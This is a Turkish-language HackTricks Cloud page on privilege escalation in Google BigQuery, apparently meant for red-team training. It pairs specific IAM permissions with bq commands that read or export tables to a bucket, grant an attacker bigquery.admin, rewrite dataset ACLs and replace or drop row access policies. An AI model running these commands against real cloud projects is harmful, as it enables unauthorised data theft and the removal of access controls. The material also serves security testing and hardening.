GCP - BigQuery Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

BigQuery

BigQuery hakkında daha fazla bilgi için kontrol edin:

GCP - Bigquery Enum

Read Table

BigQuery tablosunda saklanan bilgileri okumak, duyarlı bilgileri bulmak mümkün olabilir. Bilgilere erişmek için gereken izinler bigquery.tables.get, bigquery.jobs.create ve bigquery.tables.getData'dır:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Veri Dışa Aktarma

Bu, verilere erişmenin başka bir yoludur. Verileri bir bulut depolama kovasına dışa aktarın ve bilgileri içeren dosyaları indirin. Bu işlemi gerçekleştirmek için aşağıdaki izinler gereklidir: bigquery.tables.export, bigquery.jobs.create ve storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Veri Ekle

Bigquery tablosuna belirli güvenilir verileri başka bir yerdeki bir açığı istismar etmek için eklemek mümkün olabilir. Bu, bigquery.tables.get, bigquery.tables.updateData ve bigquery.jobs.create izinleri ile kolayca yapılabilir:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

Bir saldırgan, bu yetkiyi kendisine daha fazla izin vermek için kötüye kullanabilir:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Bu izin, ACL'leri değiştirerek bir BigQuery veri kümesine erişiminizi güncellemenize olanak tanır; bu ACL'ler kimin erişebileceğini belirtir:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

Bir saldırgan, bu yetkiyi kendisine daha fazla izin vermek için kötüye kullanabilir:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Belgelerde belirtildiği gibi, belirtilen izinlerle bir satır politikasını güncellemek mümkündür. Ancak, cli bq kullanarak biraz daha fazlasına ihtiyacınız var: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Filtre kimliğini satır politikaları sayımının çıktısında bulmak mümkündür. Örnek:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

Eğer bigquery.rowAccessPolicies.delete yerine bigquery.rowAccessPolicies.update varsa, politikayı sadece silebilirsiniz:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Satır erişim politikalarını atlatmanın bir başka potansiyel seçeneği, kısıtlı verinin değerini değiştirmek olabilir. Eğer yalnızca term değeri Cfba olduğunda görebiliyorsanız, tablodaki tüm kayıtları term = "Cfba" olacak şekilde değiştirin. Ancak bu, bigquery tarafından engellenmektedir.

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousGCP - Batch Privesc NextGCP - ClientAuthConfig Privesc

Last updated 3 days ago

BigQuery

Read Table

Veri Dışa Aktarma

Veri Ekle

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

BigQuery

Read Table

Veri Dışa Aktarma

Veri Ekle

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`